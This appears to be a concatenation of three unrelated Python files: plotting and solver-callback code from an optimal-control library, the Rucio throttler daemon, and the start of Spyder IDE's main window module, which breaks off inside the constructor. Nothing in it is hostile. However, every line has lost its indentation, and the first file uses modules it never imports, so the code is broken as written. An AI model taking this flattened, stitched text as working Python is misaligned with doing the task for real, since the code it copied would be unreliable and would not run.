from ..misc.data import Data
from ..misc.enums import PlotType, ControlType, InterpolationType
from ..misc.mapping import Mapping
from ..misc.utils import check_version
class CustomPlot:
def __init__(
self, update_function, plot_type=PlotType.PLOT, axes_idx=None, legend=(), combine_to=None, color=None, ylim=None, bounds=None,
):
"""
Initializes the plot.
:param update_function: Function to plot.
:param plot_type: Type of plot. (PLOT = 0, INTEGRATED = 1 or STEP = 2)
:param axes_idx: Index of the axis to be mapped. (integer)
:param legend: Legend of the graphs. (?)
:param combine_to: Plot in which to add the graph. ??
:param color: Color of the graphs. (?)
"""
self.function = update_function
self.type = plot_type
if axes_idx is None:
self.phase_mappings = None # Will be set later
elif isinstance(axes_idx, (tuple, list)):
self.phase_mappings = Mapping(axes_idx)
elif isinstance(axes_idx, Mapping):
self.phase_mappings = axes_idx
else:
raise RuntimeError("phase_mapping must be a list or a Mapping")
self.legend = legend
self.combine_to = combine_to
self.color = color
self.ylim = ylim
self.bounds = bounds
class PlotOcp:
def __init__(self, ocp, automatically_organize=True, adapt_graph_size_to_bounds=False):
"""Prepares the figure"""
for i in range(1, ocp.nb_phases):
if ocp.nlp[0]["nbQ"] != ocp.nlp[i]["nbQ"]:
raise RuntimeError("Graphs with nbQ different at each phase is not implemented yet")
self.ocp = ocp
self.plot_options = {
"general_options": {"use_tight_layout": False},
"non_integrated_plots": {"linestyle": "-.", "markersize": 3},
"integrated_plots": {"linestyle": "-", "markersize": 3, "linewidth": 1.1},
"bounds": {"color": "k", "linewidth": 0.4, "linestyle": "-"},
"grid": {"color": "k", "linestyle": "-", "linewidth": 0.15},
"vertical_lines": {"color": "k", "linestyle": "--", "linewidth": 1.2},
}
self.ydata = []
self.ns = 0
self.t = []
self.t_integrated = []
if isinstance(self.ocp.initial_phase_time, (int, float)):
self.tf = [self.ocp.initial_phase_time]
else:
self.tf = list(self.ocp.initial_phase_time)
self.t_idx_to_optimize = []
for i, nlp in enumerate(self.ocp.nlp):
if isinstance(nlp["tf"], self.ocp.CX):
self.t_idx_to_optimize.append(i)
self.__update_time_vector()
self.axes = {}
self.plots = []
self.plots_vertical_lines = []
self.plots_bounds = []
self.all_figures = []
self.automatically_organize = automatically_organize
self._organize_windows(len(self.ocp.nlp[0]["var_states"]) + len(self.ocp.nlp[0]["var_controls"]))
self.plot_func = {}
self.variable_sizes = []
self.adapt_graph_size_to_bounds = adapt_graph_size_to_bounds
self.__create_plots()
horz = 0
vert = 1 if len(self.all_figures) < self.nb_vertical_windows * self.nb_horizontal_windows else 0
for i, fig in enumerate(self.all_figures):
if self.automatically_organize:
try:
fig.canvas.manager.window.move(
int(vert * self.width_step), int(self.top_margin + horz * self.height_step)
)
vert += 1
if vert >= self.nb_vertical_windows:
horz += 1
vert = 0
except AttributeError:
pass
fig.canvas.draw()
if self.plot_options["general_options"]["use_tight_layout"]:
fig.tight_layout()
def __update_time_vector(self):
"""Sets x-axis array"""
self.t = []
self.t_integrated = []
last_t = 0
for phase_idx, nlp in enumerate(self.ocp.nlp):
nb_int_steps = nlp["nb_integration_steps"]
dt_ns = self.tf[phase_idx] / nlp["ns"]
time_phase_integrated = []
last_t_int = copy(last_t)
for _ in range(nlp["ns"]):
time_phase_integrated.append(np.linspace(last_t_int, last_t_int + dt_ns, nb_int_steps + 1))
last_t_int += dt_ns
self.t_integrated.append(time_phase_integrated)
self.ns += nlp["ns"] + 1
time_phase = np.linspace(last_t, last_t + self.tf[phase_idx], nlp["ns"] + 1)
last_t += self.tf[phase_idx]
self.t.append(time_phase)
def __create_plots(self):
"""Actually plots"""
variable_sizes = []
for i, nlp in enumerate(self.ocp.nlp):
variable_sizes.append({})
if "plot" in nlp:
for key in nlp["plot"]:
if isinstance(nlp["plot"][key], tuple):
nlp["plot"][key] = nlp["plot"][key][0]
if nlp["plot"][key].phase_mappings is None:
size = (
nlp["plot"][key]
.function(np.zeros((nlp["nx"], 1)), np.zeros((nlp["nu"], 1)), np.zeros((nlp["np"], 1)))
.shape[0]
)
nlp["plot"][key].phase_mappings = Mapping(range(size))
else:
size = len(nlp["plot"][key].phase_mappings.map_idx)
if key not in variable_sizes[i]:
variable_sizes[i][key] = size
else:
variable_sizes[i][key] = max(variable_sizes[i][key], size)
self.variable_sizes = variable_sizes
if not variable_sizes:
# No graph was setup in problem_type
return
self.plot_func = {}
for i, nlp in enumerate(self.ocp.nlp):
for variable in self.variable_sizes[i]:
nb = max(nlp["plot"][variable].phase_mappings.map_idx) + 1
nb_cols, nb_rows = PlotOcp._generate_windows_size(nb)
if nlp["plot"][variable].combine_to:
self.axes[variable] = self.axes[nlp["plot"][variable].combine_to]
axes = self.axes[variable][1]
elif i > 0 and variable in self.axes:
axes = self.axes[variable][1]
else:
axes = self.__add_new_axis(variable, nb, nb_rows, nb_cols)
self.axes[variable] = [nlp["plot"][variable], axes]
t = self.t[i]
if variable not in self.plot_func:
self.plot_func[variable] = [None] * self.ocp.nb_phases
self.plot_func[variable][i] = nlp["plot"][variable]
mapping = self.plot_func[variable][i].phase_mappings.map_idx
for ctr, k in enumerate(mapping):
ax = axes[k]
if k < len(self.plot_func[variable][i].legend):
axes[k].set_title(self.plot_func[variable][i].legend[k])
ax.grid(**self.plot_options["grid"])
ax.set_xlim(0, self.t[-1][-1])
if nlp["plot"][variable].ylim:
ax.set_ylim(nlp["plot"][variable].ylim)
elif self.adapt_graph_size_to_bounds and nlp["plot"][variable].bounds:
if nlp["plot"][variable].bounds.type != InterpolationType.CUSTOM:
y_min = nlp["plot"][variable].bounds.min[ctr].min()
y_max = nlp["plot"][variable].bounds.max[ctr].max()
else:
nlp["plot"][variable].bounds.check_and_adjust_dimensions(len(mapping), nlp["ns"])
y_min = min([nlp["plot"][variable].bounds.min.evaluate_at(j)[k] for j in range(nlp["ns"])])
y_max = max([nlp["plot"][variable].bounds.max.evaluate_at(j)[k] for j in range(nlp["ns"])])
y_range, _ = self.__compute_ylim(y_min, y_max, 1.25)
ax.set_ylim(y_range)
zero = np.zeros((t.shape[0], 1))
plot_type = self.plot_func[variable][i].type
if plot_type == PlotType.PLOT:
color = self.plot_func[variable][i].color if self.plot_func[variable][i].color else "tab:green"
self.plots.append(
[plot_type, i, ax.plot(t, zero, color=color, zorder=0, **self.plot_options["non_integrated_plots"])[0]]
)
elif plot_type == PlotType.INTEGRATED:
color = self.plot_func[variable][i].color if self.plot_func[variable][i].color else "tab:brown"
plots_integrated = []
nb_int_steps = nlp["nb_integration_steps"]
for cmp in range(nlp["ns"]):
plots_integrated.append(
ax.plot(
self.t_integrated[i][cmp],
np.zeros(nb_int_steps + 1),
color=color,
**self.plot_options["integrated_plots"],
)[0]
)
self.plots.append([plot_type, i, plots_integrated])
elif plot_type == PlotType.STEP:
color = self.plot_func[variable][i].color if self.plot_func[variable][i].color else "tab:orange"
self.plots.append([plot_type, i, ax.step(t, zero, where="post", color=color, zorder=0)[0]])
else:
raise RuntimeError(f"{plot_type} is not implemented yet")
for j, ax in enumerate(axes):
intersections_time = self.find_phases_intersections()
for time in intersections_time:
self.plots_vertical_lines.append(ax.axvline(time, **self.plot_options["vertical_lines"]))
if self.axes[variable][0].bounds:
if self.axes[variable][0].bounds.type == InterpolationType.EACH_FRAME:
ns = self.axes[variable][0].bounds.min.shape[1] - 1
else:
ns = nlp["ns"]
self.axes[variable][0].bounds.check_and_adjust_dimensions(
nb_elements=len(mapping), nb_shooting=ns
)
bounds_min = np.array(
[self.axes[variable][0].bounds.min.evaluate_at(k)[j] for k in range(ns + 1)]
)
bounds_max = np.array(
[self.axes[variable][0].bounds.max.evaluate_at(k)[j] for k in range(ns + 1)]
)
if bounds_min.shape[0] == nlp["ns"]:
bounds_min = np.concatenate((bounds_min, [bounds_min[-1]]))
bounds_max = np.concatenate((bounds_max, [bounds_max[-1]]))
self.plots_bounds.append(
[ax.step(self.t[i], bounds_min, where='post', **self.plot_options["bounds"]), i]
)
self.plots_bounds.append(
[ax.step(self.t[i], bounds_max, where='post', **self.plot_options["bounds"]), i]
)
def __add_new_axis(self, variable, nb, nb_rows, nb_cols):
"""
Sets the axis of the plots.
:param variable: Variable to plot (integer)
:param nb: Number of the figure. ?? (integer)
:param nb_rows: Number of rows of plots in subplots. (integer)
:param nb_cols: Number of columns of plots in subplots. (integer)
:return: axes: Axes of the plots. (instance of subplot class)
"""
if self.automatically_organize:
self.all_figures.append(plt.figure(variable, figsize=(self.width_step / 100, self.height_step / 131)))
else:
self.all_figures.append(plt.figure(variable))
axes = self.all_figures[-1].subplots(nb_rows, nb_cols)
if isinstance(axes, np.ndarray):
axes = axes.flatten()
else:
axes = [axes]
for i in range(nb, len(axes)):
axes[i].remove()
axes = axes[:nb]
idx_center = nb_rows * nb_cols - int(nb_cols / 2) - 1
if idx_center >= len(axes):
idx_center = len(axes) - 1
axes[idx_center].set_xlabel("time (s)")
self.all_figures[-1].tight_layout()
return axes
def _organize_windows(self, nb_windows):
"""
Organizes esthetically the figure.
:param nb_windows: Number of variables to plot. (integer)
"""
self.nb_vertical_windows, self.nb_horizontal_windows = PlotOcp._generate_windows_size(nb_windows)
if self.automatically_organize:
height = tkinter.Tk().winfo_screenheight()
width = tkinter.Tk().winfo_screenwidth()
self.top_margin = height / 15
self.height_step = (height - self.top_margin) / self.nb_horizontal_windows
self.width_step = width / self.nb_vertical_windows
else:
self.top_margin = None
self.height_step = None
self.width_step = None
def find_phases_intersections(self):
"""Finds the intersection between phases"""
return list(accumulate(self.tf))[:-1]
@staticmethod
def show():
plt.show()
def update_data(self, V):
"""Update of the variable V to plot (dependent axis)"""
self.ydata = []
data_states, data_controls, data_param = Data.get_data(
self.ocp, V, get_parameters=True, integrate=True, concatenate=False
)
data_param_in_dyn = np.array([data_param[key] for key in data_param if key != "time"]).squeeze()
for _ in self.ocp.nlp:
if self.t_idx_to_optimize:
for i_in_time, i_in_tf in enumerate(self.t_idx_to_optimize):
self.tf[i_in_tf] = data_param["time"][i_in_time]
self.__update_xdata()
data_states_per_phase, data_controls_per_phase = Data.get_data(self.ocp, V, integrate=True, concatenate=False)
for i, nlp in enumerate(self.ocp.nlp):
step_size = nlp["nb_integration_steps"] + 1
nb_elements = nlp["ns"] * step_size + 1
state = np.ndarray((0, nb_elements))
for s in nlp["var_states"]:
if isinstance(data_states_per_phase[s], (list, tuple)):
state = np.concatenate((state, data_states_per_phase[s][i]))
else:
state = np.concatenate((state, data_states_per_phase[s]))
control = np.ndarray((0, nlp["ns"] + 1))
for s in nlp["var_controls"]:
if isinstance(data_controls_per_phase[s], (list, tuple)):
control = np.concatenate((control, data_controls_per_phase[s][i]))
else:
control = np.concatenate((control, data_controls_per_phase[s]))
if nlp["control_type"] == ControlType.CONSTANT:
u_mod = 1
elif nlp["control_type"] == ControlType.LINEAR_CONTINUOUS:
u_mod = 2
else:
raise NotImplementedError(f"Plotting {nlp['control_type']} is not implemented yet")
for key in self.variable_sizes[i]:
if self.plot_func[key][i].type == PlotType.INTEGRATED:
all_y = []
for idx, t in enumerate(self.t_integrated[i]):
y_tp = np.empty((self.variable_sizes[i][key], len(t)))
y_tp.fill(np.nan)
y_tp[:, :] = self.plot_func[key][i].function(
state[:, step_size * idx : step_size * (idx + 1)],
control[:, idx : idx + u_mod],
data_param_in_dyn,
)
all_y.append(y_tp)
for idx in range(len(self.plot_func[key][i].phase_mappings.map_idx)):
y_tp = []
for y in all_y:
y_tp.append(y[idx, :])
self.__append_to_ydata([y_tp])
else:
y = np.empty((self.variable_sizes[i][key], len(self.t[i])))
y.fill(np.nan)
y[:, :] = self.plot_func[key][i].function(state[:, ::step_size], control, data_param_in_dyn)
self.__append_to_ydata(y)
self.__update_axes()
def __update_xdata(self):
"""Update of the time in plots (independent axis)"""
self.__update_time_vector()
for plot in self.plots:
phase_idx = plot[1]
if plot[0] == PlotType.INTEGRATED:
for cmp, p in enumerate(plot[2]):
p.set_xdata(self.t_integrated[phase_idx][cmp])
ax = plot[2][-1].axes
else:
plot[2].set_xdata(self.t[phase_idx])
ax = plot[2].axes
ax.set_xlim(0, self.t[-1][-1])
if self.plots_bounds:
for plot_bounds in self.plots_bounds:
plot_bounds[0][0].set_xdata(self.t[plot_bounds[1]])
ax = plot_bounds[0][0].axes
ax.set_xlim(0, self.t[-1][-1])
intersections_time = self.find_phases_intersections()
n = len(intersections_time)
if n > 0:
for p in range(int(len(self.plots_vertical_lines) / n)):
for i, time in enumerate(intersections_time):
self.plots_vertical_lines[p * n + i].set_xdata([time, time])
def __append_to_ydata(self, data):
for y in data:
self.ydata.append(y)
def __update_axes(self):
"""Updates axes ranges"""
assert len(self.plots) == len(self.ydata)
for i, plot in enumerate(self.plots):
y = self.ydata[i]
if plot[0] == PlotType.INTEGRATED:
for cmp, p in enumerate(plot[2]):
p.set_ydata(y[cmp])
else:
plot[2].set_ydata(y)
for p in self.plots_vertical_lines:
p.set_ydata((np.nan, np.nan))
for key in self.axes:
if not self.adapt_graph_size_to_bounds:
for i, ax in enumerate(self.axes[key][1]):
if not self.axes[key][0].ylim:
y_max = -np.inf
y_min = np.inf
children_list = [p for p in ax.get_children() if isinstance(p, lines.Line2D)]
for p in children_list[:-2]:
y_min = min(y_min, np.min(p.get_ydata()))
y_max = max(y_max, np.max(p.get_ydata()))
y_range, data_range = self.__compute_ylim(y_min, y_max, 1.25)
ax.set_ylim(y_range)
ax.set_yticks(np.arange(y_range[0], y_range[1], step=data_range / 4,))
for p in self.plots_vertical_lines:
p.set_ydata((0, 1))
@staticmethod
def __compute_ylim(min_val, max_val, threshold):
if np.isnan(min_val) or np.isinf(min_val):
min_val = 0
if np.isnan(max_val) or np.isinf(max_val):
max_val = 1
data_mean = np.mean((min_val, max_val))
data_range = max_val - min_val
if np.abs(data_range) < 0.8:
data_range = 0.8
y_range = (threshold * data_range) / 2
y_range = data_mean - y_range, data_mean + y_range
return y_range, data_range
@staticmethod
def _generate_windows_size(nb):
"""
Defines the number of column and rows of subplots in function of the number of variables to plot.
:param nb: Number of variables to plot. (integer)
:return: nb_rows: Number of rows of subplot. (integer)
"""
nb_rows = int(round(np.sqrt(nb)))
return nb_rows + 1 if nb_rows * nb_rows < nb else nb_rows, nb_rows
class ShowResult:
def __init__(self, ocp, sol):
self.ocp = ocp
self.sol = sol
def graphs(self, automatically_organize=True, adapt_graph_size_to_bounds=False):
plot_ocp = PlotOcp(self.ocp, automatically_organize=automatically_organize, adapt_graph_size_to_bounds=adapt_graph_size_to_bounds)
plot_ocp.update_data(self.sol["x"])
plt.show()
def animate(self, nb_frames=80, **kwargs):
"""
Animate solution with BiorbdViz
:param nb_frames: Number of frames in the animation. (integer)
"""
try:
import BiorbdViz
except ModuleNotFoundError:
raise RuntimeError("BiorbdViz must be install to animate the model")
check_version(BiorbdViz, "1.3.3", "1.4.0")
data_interpolate, data_control = Data.get_data(
self.ocp, self.sol["x"], integrate=False, interpolate_nb_frames=nb_frames
)
if not isinstance(data_interpolate["q"], (list, tuple)):
data_interpolate["q"] = [data_interpolate["q"]]
all_bioviz = []
for idx_phase, data in enumerate(data_interpolate["q"]):
all_bioviz.append(BiorbdViz.BiorbdViz(loaded_model=self.ocp.nlp[idx_phase]["model"], **kwargs))
all_bioviz[-1].load_movement(self.ocp.nlp[idx_phase]["q_mapping"].expand.map(data))
b_is_visible = [True] * len(all_bioviz)
while sum(b_is_visible):
for i, b in enumerate(all_bioviz):
if b.vtk_window.is_active:
b.update()
else:
b_is_visible[i] = False
@staticmethod
def keep_matplotlib():
plt.figure(figsize=(0.01, 0.01)).canvas.manager.window.move(1000, 100)
plt.show()
class OnlineCallback(Callback):
def __init__(self, ocp, opts={}):
Callback.__init__(self)
self.nlp = ocp
self.nx = ocp.V.rows()
self.ng = 0
self.construct("AnimateCallback", opts)
self.plot_pipe, plotter_pipe = mp.Pipe()
self.plotter = self.ProcessPlotter(ocp)
self.plot_process = mp.Process(target=self.plotter, args=(plotter_pipe,), daemon=True)
self.plot_process.start()
@staticmethod
def get_n_in():
return nlpsol_n_out()
@staticmethod
def get_n_out():
return 1
@staticmethod
def get_name_in(i):
return nlpsol_out(i)
@staticmethod
def get_name_out(_):
return "ret"
def get_sparsity_in(self, i):
n = nlpsol_out(i)
if n == "f":
return Sparsity.scalar()
elif n in ("x", "lam_x"):
return Sparsity.dense(self.nx)
elif n in ("g", "lam_g"):
return Sparsity.dense(self.ng)
else:
return Sparsity(0, 0)
def eval(self, arg):
send = self.plot_pipe.send
send(arg[0])
return [0]
class ProcessPlotter(object):
def __init__(self, ocp):
self.ocp = ocp
def __call__(self, pipe):
self.pipe = pipe
self.plot = PlotOcp(self.ocp)
timer = self.plot.all_figures[0].canvas.new_timer(interval=100)
timer.add_callback(self.callback)
timer.start()
plt.show()
def callback(self):
while self.pipe.poll():
V = self.pipe.recv()
self.plot.update_data(V)
Iterations.save(V)
for i, fig in enumerate(self.plot.all_figures):
fig.canvas.draw()
return True
class Iterations:
@staticmethod
def save(V):
file_path = ".__tmp_biorbd_optim/temp_save_iter.bobo"
if os.path.isfile(file_path):
with open(file_path, "rb") as file:
previews_iterations = pickle.load(file)
previews_iterations.append(np.array(V))
with open(file_path, "wb") as file:
pickle.dump(previews_iterations, file)
|
throttler.py | # Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0OA
#
# Authors:
# - Vincent Garonne, <vincent.garonne@cern.ch>, 2012-2015
# - Mario Lassnig, <mario.lassnig@cern.ch>, 2013-2015
# - Cedric Serfon, <cedric.serfon@cern.ch>, 2013-2015
# - Wen Guan, <wen.guan@cern.ch>, 2014-2016
"""
Conveyor throttler is a daemon to manage rucio internal queue.
"""
import logging
import os
import socket
import sys
import threading
import time
import traceback
from rucio.common.config import config_get
from rucio.core import heartbeat
from rucio.daemons.conveyor.utils import schedule_requests
logging.basicConfig(stream=sys.stdout,
level=getattr(logging, config_get('common', 'loglevel').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
graceful_stop = threading.Event()
def throttler(once=False, sleep_time=600):
"""
Main loop to check rse transfer limits.
"""
logging.info('Throttler starting')
executable = 'throttler'
hostname = socket.getfqdn()
pid = os.getpid()
hb_thread = threading.current_thread()
heartbeat.sanity_check(executable=executable, hostname=hostname)
hb = heartbeat.live(executable, hostname, pid, hb_thread)
logging.info('Throttler started - thread (%i/%i) timeout (%s)' % (hb['assign_thread'], hb['nr_threads'], sleep_time))
current_time = time.time()
while not graceful_stop.is_set():
try:
hb = heartbeat.live(executable, hostname, pid, hb_thread, older_than=3600)
logging.info('Throttler - thread (%i/%i)' % (hb['assign_thread'], hb['nr_threads']))
if hb['assign_thread'] != 0:
logging.info('Throttler thread id is not 0, will sleep. Only thread 0 will work')
while time.time() < current_time + sleep_time:
time.sleep(1)
if graceful_stop.is_set() or once:
break
current_time = time.time()
continue
logging.info("Throttler thread %s - schedule requests" % hb['assign_thread'])
schedule_requests()
while time.time() < current_time + sleep_time:
time.sleep(1)
if graceful_stop.is_set() or once:
break
current_time = time.time()
except:
logging.critical('Throtter thread %s - %s' % (hb['assign_thread'], traceback.format_exc()))
if once:
break
logging.info('Throtter thread %s - graceful stop requested' % (hb['assign_thread']))
heartbeat.die(executable, hostname, pid, hb_thread)
logging.info('Throtter thread %s - graceful stop done' % (hb['assign_thread']))
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, sleep_time=600):
"""
Starts up the conveyer threads.
"""
threads = []
logging.info('starting throttler thread')
throttler_thread = threading.Thread(target=throttler, kwargs={'once': once, 'sleep_time': sleep_time})
threads.append(throttler_thread)
[t.start() for t in threads]
logging.info('waiting for interrupts')
# Interruptible joins require a timeout.
while len(threads) > 0:
threads = [t.join(timeout=3.14) for t in threads if t and t.isAlive()]
|
mainwindow.py | # -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific PYthon Development EnviRonment
=====================================================
Developped and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
import atexit
import errno
import os
import os.path as osp
import re
import shutil
import signal
import socket
import subprocess
import sys
import threading
import traceback
#==============================================================================
# Keeping a reference to the original sys.exit before patching it
#==============================================================================
ORIGINAL_SYS_EXIT = sys.exit
#==============================================================================
# Check requirements
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
#==============================================================================
# Windows only: support for hiding console window when started with python.exe
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
is_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Workaround: importing rope.base.project here, otherwise this module can't
# be imported if Spyder was executed from another folder than spyder
#==============================================================================
try:
import rope.base.project # analysis:ignore
except ImportError:
pass
#==============================================================================
# Qt imports
#==============================================================================
from qtpy import API, PYQT5
from qtpy.compat import from_qvariant, getopenfilename, getsavefilename
from qtpy.QtCore import (QByteArray, QCoreApplication, QPoint, QSize, Qt,
QThread, QTimer, QUrl, Signal, Slot)
from qtpy.QtGui import QColor, QDesktopServices, QKeySequence, QPixmap
from qtpy.QtWidgets import (QAction, QApplication, QDockWidget, QMainWindow,
QMenu, QMessageBox, QShortcut, QSplashScreen,
QStyleFactory)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
# when PySide is selected by the QT_API environment variable and when PyQt4
# is also installed (or any other Qt-based application prepending a directory
# containing incompatible Qt DLLs versions in PATH):
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
#==============================================================================
# Proper high DPI scaling is available in Qt >= 5.6.0. This attibute must
# be set before creating the application
#==============================================================================
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling, True)
#==============================================================================
# Create our QApplication instance here because it's needed to render the
# splash screen created below
#==============================================================================
from spyder.utils.qthelpers import qapplication
MAIN_APP = qapplication()
#==============================================================================
# Create splash screen out of MainWindow to reduce perceived startup time.
#==============================================================================
from spyder.config.base import _, get_image_path, DEV
SPLASH = QSplashScreen(QPixmap(get_image_path('splash.svg'), 'svg'))
SPLASH_FONT = SPLASH.font()
SPLASH_FONT.setPixelSize(10)
SPLASH.setFont(SPLASH_FONT)
SPLASH.show()
SPLASH.showMessage(_("Initializing..."), Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute, QColor(Qt.white))
QApplication.processEvents()
#==============================================================================
# Local utility imports
#==============================================================================
from spyder import __version__, __project_url__, __forum_url__, get_versions
from spyder.config.base import (get_conf_path, get_module_data_path,
get_module_source_path, STDERR, DEBUG,
debug_print, MAC_APP_NAME, get_home_dir,
running_in_mac_app, get_module_path,
reset_config_files)
from spyder.config.main import CONF, OPEN_FILES_PORT
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.app.cli_options import get_options
from spyder import dependencies
from spyder.config.ipython import QTCONSOLE_INSTALLED
from spyder.config.user import NoDefault
from spyder.py3compat import (getcwd, is_text_string, to_text_string,
PY3, qbytearray_to_str, u, configparser as cp)
from spyder.utils import encoding, programs
from spyder.utils import icon_manager as ima
from spyder.utils.introspection import module_completion
from spyder.utils.programs import is_module_installed
from spyder.utils.misc import select_port
#==============================================================================
# Local gui imports
#==============================================================================
# NOTE: Move (if possible) import's of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
try:
from spyder.utils.environ import WinUserEnvDialog
except ImportError:
WinUserEnvDialog = None # analysis:ignore
from spyder.utils.qthelpers import (create_action, add_actions, get_icon,
add_shortcut_to_tooltip,
create_module_bookmark_actions,
create_program_action, DialogManager,
create_python_script_action, file_uri)
from spyder.config.gui import get_shortcut
from spyder.otherplugins import get_spyderplugins_mods
from spyder.app import tour
#==============================================================================
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
#==============================================================================
CWD = getcwd()
#==============================================================================
# Spyder's main window widgets utilities
#==============================================================================
def get_python_doc_path():
"""
Return Python documentation path
(Windows: return the PythonXX.chm path if available)
"""
if os.name == 'nt':
doc_path = osp.join(sys.prefix, "Doc")
if not osp.isdir(doc_path):
return
python_chm = [path for path in os.listdir(doc_path)
if re.match(r"(?i)Python[0-9]{3,6}.chm", path)]
if python_chm:
return file_uri(osp.join(doc_path, python_chm[0]))
else:
vinf = sys.version_info
doc_path = '/usr/share/doc/python%d.%d/html' % (vinf[0], vinf[1])
python_doc = osp.join(doc_path, "index.html")
if osp.isfile(python_doc):
return file_uri(python_doc)
def get_focus_python_shell():
"""Extract and return Python shell from widget
Return None if *widget* is not a Python shell (e.g. IPython kernel)"""
widget = QApplication.focusWidget()
from spyder.widgets.shell import PythonShellWidget
from spyder.widgets.externalshell.pythonshell import ExternalPythonShell
if isinstance(widget, PythonShellWidget):
return widget
elif isinstance(widget, ExternalPythonShell):
return widget.shell
def get_focus_widget_properties():
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
widget = QApplication.focusWidget()
from spyder.widgets.shell import ShellBaseWidget
from spyder.widgets.editor import TextEditBaseWidget
textedit_properties = None
if isinstance(widget, (ShellBaseWidget, TextEditBaseWidget)):
console = isinstance(widget, ShellBaseWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = QMainWindow.AllowTabbedDocks|QMainWindow.AllowNestedDocks
SPYDER_PATH = get_conf_path('path')
BOOKMARKS = (
('numpy', "http://docs.scipy.org/doc/",
_("Numpy and Scipy documentation")),
('matplotlib', "http://matplotlib.sourceforge.net/contents.html",
_("Matplotlib documentation")),
('PyQt4',
"http://pyqt.sourceforge.net/Docs/PyQt4/",
_("PyQt4 Reference Guide")),
('PyQt4',
"http://pyqt.sourceforge.net/Docs/PyQt4/classes.html",
_("PyQt4 API Reference")),
('xy', "http://code.google.com/p/pythonxy/",
_("Python(x,y)")),
('winpython', "https://winpython.github.io/",
_("WinPython"))
)
# Signals
restore_scrollbar_position = Signal()
all_actions_defined = Signal()
sig_pythonpath_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # related to interactive tour
sig_moved = Signal("QMoveEvent") # related to interactive tour
def __init__(self, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if PYQT5:
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.dialog_manager = DialogManager()
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
self.debug_print("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
# Loading Spyder path
self.path = []
self.project_path = []
if osp.isfile(self.SPYDER_PATH):
self.path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = [name for name in self.path if osp.isdir(name)]
self.remove_path_from_sys_path()
self.add_path_to_sys_path()
# Plugins
self.console = None
self.workingdirectory = None
self.editor = None
self.explorer = None
self.help = None
self.onlinehelp = None
self.projects = None
self.outlineexplorer = None
self.historylog = None
self.extconsole = None
self.ipyconsole = None
self.variableexplorer = None
self.findinfiles = None
self.thirdparty_plugins = []
# Tour # TODO: Should I consider it a plugin?? or?
self.tour = None
self.tours_available = None
# Check for updates Thread and Worker, refereces needed to prevent
# segfaulting
self.check_updates_action = None
self.thread_updates = None
self.worker_updates = None
self.give_updates_feedback = True
# Preferences
from spyder.plugins.configdialog import (MainConfigPage,
ColorSchemeConfigPage)
from spyder.plugins.shortcuts import ShortcutsConfigPage
from spyder.plugins.runconfig import RunConfigPage
self.general_prefs = [MainConfigPage, ShortcutsConfigPage,
ColorSchemeConfigPage, RunConfigPage]
self.prefs_index = None
self.prefs_dialog_size = None
# Quick Layouts and Dialogs
from spyder.plugins.layoutdialog import (LayoutSaveDialog,
LayoutSettingsDialog)
self.dialog_layout_save = LayoutSaveDialog
self.dialog_layout_settings = LayoutSettingsDialog
# Actions
self.lock_dockwidgets_action = None
self.show_toolbars_action = None
self.close_dockwidget_action = None
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
self.maximize_action = None
self.fullscreen_action = None
# Menu bars
self.file_menu = None
self.file_menu_actions = []
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
self.tools_menu = None
self.tools_menu_actions = []
